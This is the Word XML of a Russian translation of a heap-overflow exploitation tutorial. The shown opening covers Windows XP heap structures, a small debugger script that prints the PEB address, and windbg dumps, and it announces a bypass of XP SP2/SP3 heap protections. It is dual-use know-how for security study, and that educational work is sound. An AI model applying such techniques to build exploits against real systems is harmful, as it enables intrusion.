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4.png" ContentType="image/png"/>
  <Override PartName="/word/media/image23.png" ContentType="image/png"/>
  <Override PartName="/word/media/image8.png" ContentType="image/png"/>
  <Override PartName="/word/media/image3.png" ContentType="image/png"/>
  <Override PartName="/word/media/image38.png" ContentType="image/png"/>
  <Override PartName="/word/media/image30.png" ContentType="image/png"/>
  <Override PartName="/word/media/image28.png" ContentType="image/png"/>
  <Override PartName="/word/media/image34.png" ContentType="image/png"/>
  <Override PartName="/word/media/image29.png" ContentType="image/png"/>
  <Override PartName="/word/media/image10.png" ContentType="image/png"/>
  <Override PartName="/word/media/image35.png" ContentType="image/png"/>
  <Override PartName="/word/media/image27.png" ContentType="image/png"/>
  <Override PartName="/word/media/image33.png" ContentType="image/png"/>
  <Override PartName="/word/media/image26.png" ContentType="image/png"/>
  <Override PartName="/word/media/image32.png" ContentType="image/png"/>
  <Override PartName="/word/media/image25.png" ContentType="image/png"/>
  <Override PartName="/word/media/image31.png" ContentType="image/png"/>
  <Override PartName="/word/media/image9.png" ContentType="image/png"/>
  <Override PartName="/word/media/image24.png" ContentType="image/png"/>
  <Override PartName="/word/media/image1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6.png" ContentType="image/png"/>
  <Override PartName="/word/media/image1.png" ContentType="image/png"/>
  <Override PartName="/word/media/image6.png" ContentType="image/png"/>
  <Override PartName="/word/media/image2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highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://www.fuzzysecurity.com/tutorials/mr_me/3.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Переполнение буфера кучи. Часть 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В первой части я рассказывал про способы эксплуатации переполнения буфера кучи на старой версии Windows. Задачей было предоставить читателю практические знания и понимание того, как работает процесс выделения/освобождения памяти и как через указатели flink/blink из freelist[n] можно записывать произвольные 4 байта.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">В этой статье я в первую очередь освежаю свои собственные знания (я забывчив), а также пытаюсь помочь специалистам по безопасности обрести понимание принципов работы менеджера кучи в старых версиях Windows (NT v5 и старше). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Оно</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> нужно для эксплуатации переполнения кучи и преодоления некоторых ограничений, предлотвращ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ающих </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"записи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>четвёрки</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[запись четырёх байт]</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Помимо этого статья </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>даст читателю некоторую точку отсчёта в знани</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>х, которая без сомнения пригодится при атаке более свежих версии кучи windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Будет </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>расска</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">зано </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">только об одной хорошо известной методике обхода системы защиты кучи в Windows XP SP2/SP3. Таким образом </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">этот текст </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ни в коей мере не является полным руководством или попыткой описать все детали кучи.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Для продолжения потребуется относительно глубокое понимание работы структур кучи в </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">indows XP/Server 2003. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Я</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> расскажу некоторые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">тонкости </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">внутренней работы кучи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>как д</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ля этой статьи, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>так</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> и на основе фидбека о первой части "Переполнения буфера кучи".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Если вы не знакомы с принципами переполнения буфера кучи, я рекомендую вам сперва сфокусироваться на этой теме.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Чтобы повторить мои действия вам понадобится:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Windows XP с установленным SP1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Windows XP с установленным SP2/SP3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Отладчик (Olly Debugger, Immunity Debugger, windbg и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Компилятор C/C++ (Dev C++, lcc-32, MS visual C++ 6.0 (если вы сможете его достать)).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Удобный для вас скриптовый язык (Я использую python, вы можете пользоваться perl)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Мозги (и/или настойчивость)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Некоторые знания Ассемблера, C. Также умение использовать плагин HideDbg для Olly или !hidedebug в Immunity debugger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Время.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Налейте себе кофе, и вперёд изучать таинственное тёмное искусство.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Так что же такое чанк и блок?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Windows имеет специальную структуру, которая называется куча. По смещению 0x90 в структуре PEB(Process Environment Block) находится список куч данного процесса в хронологическом порядке. Давайте взглянем на них.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Используя Windbg, мы найдём текущий PEB с помощью команды !peb. Эту же команду можно использовать в Immunity Debugger. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Ниже приведён о</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>чень простой код, возвращающий адре</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> PEB:</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t>from immlib import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>def main(args):</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imm = Debugger()</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peb_address = imm.getPEBAddress()</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info = 'PEB: 0x%08x' % peb_address</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return info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Добравшись до PEB мы видим кучи процесса:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>+0x090 ProcessHeaps : 0x7c97ffe0 -&gt; 0x00240000 Void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Давайте сдампим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>dword’ы</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, находящиеся по этому указателю:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>0:000&gt; dd 7c97ffe0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c97ffe0</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00240000</w:t>
        <w:tab/>
        <w:t>00340000</w:t>
        <w:tab/>
        <w:t>00350000</w:t>
        <w:tab/>
        <w:t>003e0000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c97fff0</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>00480000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c980000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c980010</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c980020</w:t>
        <w:tab/>
        <w:t>02c402c2</w:t>
        <w:tab/>
        <w:t>00020498</w:t>
        <w:tab/>
        <w:t>00000001</w:t>
        <w:tab/>
        <w:t>7c9b2000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c980030</w:t>
        <w:tab/>
        <w:t>7ffd2de6</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>00000005</w:t>
        <w:tab/>
        <w:t>00000001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c980040</w:t>
        <w:tab/>
        <w:t>fffff89c</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
        <w:tab/>
        <w:t>003a0043</w:t>
        <w:tab/>
        <w:t>0057005c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7c980050</w:t>
        <w:tab/>
        <w:t>004e0049</w:t>
        <w:tab/>
        <w:t>004f0044</w:t>
        <w:tab/>
        <w:t>00530057</w:t>
        <w:tab/>
        <w:t>0073005c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Адреса, выделенные жирным - это кучи, используемые текущим процессом. Эти же данные можно получить в обоих отладчиках командой !heap.</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93365" cy="1079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93365" cy="1079500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Также в windbg вы можете просмотреть статистику по каждой куче командой !head -stat. Ниже её вывод:</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_HEAP</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>00030000</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Segments</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>00000002</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Reserved bytes</w:t>
        <w:tab/>
        <w:t>00110000</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Committed bytes</w:t>
        <w:tab/>
        <w:t>00014000</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VirtAllocBlocks</w:t>
        <w:tab/>
        <w:t>00000000</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VirtAlloc bytes</w:t>
        <w:tab/>
        <w:t>00000000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
